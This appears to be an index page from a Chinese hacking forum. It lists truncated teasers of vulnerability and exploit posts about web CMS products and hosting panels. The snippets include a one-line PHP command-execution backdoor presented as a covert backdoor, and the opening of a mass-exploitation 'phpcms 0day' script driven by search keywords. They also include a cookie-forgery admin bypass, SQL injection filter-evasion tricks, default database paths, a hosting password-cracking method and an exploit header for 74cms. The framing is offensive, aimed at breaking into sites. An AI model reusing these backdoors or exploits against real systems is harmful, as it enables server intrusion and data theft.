建站之星 SiteStar V2.0 任意文件上传漏洞
发布日期:2011-03.16 发布作者:cnryan 影响版本:SiteStar V2.0 beta 官方网站:http://www.sitestar.cn/ 漏洞类型:文件上传 [1]漏洞概述: SiteStar V2.0没有正确限制文件的上传,远程攻击者可能利用此漏洞上传任意文件到Web目录,最终导致在服务器上执行任意命令。 [2]漏洞分析: 漏洞产生在 /script/multiuploa...
phpcms-exp 0day
<?php error_reporting(E_ERROR); set_time_limit(0);</p> <p>$keyword='inurl:about/joinus' ; // 批量关键字 $timeout = 1; $stratpage = 1; $lastpage = 10000000; for ($i=$stratpage ; $i<=$lastp...
千博企业程序-一个防注入的小白错误
If EnableStopInjection = True Then If Request.QueryString <> "" Then Call StopInjection(Request.QueryString) If Request.Cookies <> "" Then Call StopInjection(Request.Cookies) If Request.Co...
搜一次 cms php 通杀
洞文件 admin 目录下的 admin_loginstate.php 看代码 if(empty($_COOKIE['S_AdminID'])){ echo "<script>window.location='admin_login.php'</script>"; exit; } elseif($_COOKIE['S_Login']!=md5($_COOKIE['S_Adm...
一个官方没有公布的php秘籍,可用作后门
发现这个也是巧合,我就直接说了吧 <?php //t.php $test = $_GET['r']; echo `$test`; ?> 大家看看这个代码有木有问题? 这里是我们自己的交流平台,是属于我们90sec所有成员的技术分享平台! 我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了, 信息安全团队 而且又不是单引号,这个就是关键所...
Linux系统各版本的本地root密码破解方法
这段时间老碰到有人问及各个linux版本的本地root密码破解方法,我这里自己以及在网络上搜集了些资料,希望对看到了这文章而又恰好用得到的技术人员有点帮助: (一)RedHat/CentOS/Fedora 系统密码破解 1.在grub选项菜单按E进入编辑模式 2.编辑kernel 那行最后加上S (或者Single) 3.按B,启动到single-user mode 4.进入后执行...
COCOON Counter统计程序漏洞总结
一、默认数据库: counter/_db/db_CC_Counter6.mdb 也可直接打开:https://www.webshell.cc/Counter/utilities/update.asp 查看源文件,查找<! ,就可以找到数据库的地址。程序的问题。 二、暴路径漏洞 利用探针https://www.webshell.cc/Counter/utilities/aspSysCheck.as...
N点虚拟主机管理系统密码破解方法
N点虚拟主机加密方式是他自定义的函数,封装到了DLL里面,你在N点主机管理系统的目录新建一个ASP文件内容如下 <!--#include file="inc/conn.asp"--> <!--#include file="inc/siteinfo.asp"--> <!--#include file="inc/char.asp"--> <% set iish...
浅谈新型的sql注入测试
前段时间,帮别人看网站,习惯性的’,and 1=1 其实知道这种肯定被过滤,但还是测试了 php+mysql 首先说判断: Null值相信大家不陌生吧,可这么用: and 1 is null,and 1 is not null 或: and 2<=3 其实,很多人习惯性的用=号来判断了,但是,如: >= ,<= ,is nu...
很久以前的EXP 74cms 漏洞!
不解释了! <?php /* 骑士CMS漏洞利用Exp Author:mer4en7y[90sec Team] Home:www.90sec.org 声明:漏洞发现者:毅心毅意(发布在t00ls) 在日站的时候,碰到了这个系统,于是搞了这么个EXP, 水平有限,写的粗糙了点,忘大牛无见笑 大部分代码参考了子仪牛 */ /*利用方法:$host:主机,$user修改为注册的用户名 $pwd修改...